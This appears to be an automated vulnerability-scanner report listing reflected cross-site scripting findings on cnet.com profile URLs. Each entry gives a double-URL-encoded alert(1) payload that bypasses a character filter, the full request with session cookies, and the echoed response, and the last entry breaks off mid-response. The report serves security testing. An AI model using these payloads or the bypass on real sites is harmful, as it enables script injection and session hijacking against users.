The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e00b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0bae1c270d9 was submitted in the REST URL parameter 2. This input was echoed as 7e00b"><script>alert(1)</script>0bae1c270d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/selloco7e00b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0bae1c270d9/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:32 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:32 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=990
Connection: Keep-Alive
Content-Length: 31114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="selloco7e00b"><script>alert(1)</script>0bae1c270d9"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df8e6%253cscript%253ealert%25281%2529%253c%252fscript%253e8804dd94f9f was submitted in the REST URL parameter 2. This input was echoed as df8e6<script>alert(1)</script>8804dd94f9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/sellocodf8e6%253cscript%253ealert%25281%2529%253c%252fscript%253e8804dd94f9f/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:34 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:34 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=992
Connection: Keep-Alive
Content-Length: 30989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>sellocodf8e6<script>alert(1)</script>8804dd94f9f's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c4256%253cscript%253ealert%25281%2529%253c%252fscript%253ea03fe790498 was submitted in the REST URL parameter 2. This input was echoed as c4256<script>alert(1)</script>a03fe790498 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/sharmajuniorc4256%253cscript%253ealert%25281%2529%253c%252fscript%253ea03fe790498/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:45 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:46 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=969
Connection: Keep-Alive
Content-Length: 31118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>sharmajuniorc4256<script>alert(1)</script>a03fe790498's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1f97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19fa04b638d was submitted in the REST URL parameter 2. This input was echoed as e1f97"><script>alert(1)</script>19fa04b638d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/sharmajuniore1f97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19fa04b638d/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:44 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:44 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=966
Connection: Keep-Alive
Content-Length: 31105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="sharmajuniore1f97"><script>alert(1)</script>19fa04b638d"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5512f%253cscript%253ealert%25281%2529%253c%252fscript%253e34187426055 was submitted in the REST URL parameter 2. This input was echoed as 5512f<script>alert(1)</script>34187426055 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/shootfirst5512f%253cscript%253ealert%25281%2529%253c%252fscript%253e34187426055/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:43 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:44 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=977
Connection: Keep-Alive
Content-Length: 31092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>shootfirst5512f<script>alert(1)</script>34187426055's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de616%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea59830e7876 was submitted in the REST URL parameter 2. This input was echoed as de616"><script>alert(1)</script>a59830e7876 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/shootfirstde616%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea59830e7876/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:42 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:42 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=950
Connection: Keep-Alive
Content-Length: 31132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="shootfirstde616"><script>alert(1)</script>a59830e7876"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8676c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e620203038 was submitted in the REST URL parameter 2. This input was echoed as 8676c"><script>alert(1)</script>9e620203038 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/srosenblatt8676c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e620203038/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:10:24 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:10:25 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=993
Connection: Keep-Alive
Content-Length: 31077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="srosenblatt8676c"><script>alert(1)</script>9e620203038"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6f4f5%253cscript%253ealert%25281%2529%253c%252fscript%253ea235b8453f was submitted in the REST URL parameter 2. This input was echoed as 6f4f5<script>alert(1)</script>a235b8453f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/srosenblatt6f4f5%253cscript%253ealert%25281%2529%253c%252fscript%253ea235b8453f/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:10:26 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:10:26 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=988
Connection: Keep-Alive
Content-Length: 31107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>srosenblatt6f4f5<script>alert(1)</script>a235b8453f's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7425a%253cscript%253ealert%25281%2529%253c%252fscript%253eaddcc941c75 was submitted in the REST URL parameter 2. This input was echoed as 7425a<script>alert(1)</script>addcc941c75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/stevenmusil7425a%253cscript%253ealert%25281%2529%253c%252fscript%253eaddcc941c75/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:08:43 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:08:43 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=993
Connection: Keep-Alive
Content-Length: 31034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>stevenmusil7425a<script>alert(1)</script>addcc941c75's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e159e1751bb9 was submitted in the REST URL parameter 2. This input was echoed as 36808"><script>alert(1)</script>159e1751bb9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/stevenmusil36808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e159e1751bb9/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:08:41 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:08:41 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=985
Connection: Keep-Alive
Content-Length: 31107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="stevenmusil36808"><script>alert(1)</script>159e1751bb9"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40263%253cscript%253ealert%25281%2529%253c%252fscript%253e375fbdcdad9 was submitted in the REST URL parameter 2. This input was echoed as 40263<script>alert(1)</script>375fbdcdad9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/wcunning40263%253cscript%253ealert%25281%2529%253c%252fscript%253e375fbdcdad9/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:24 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:25 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
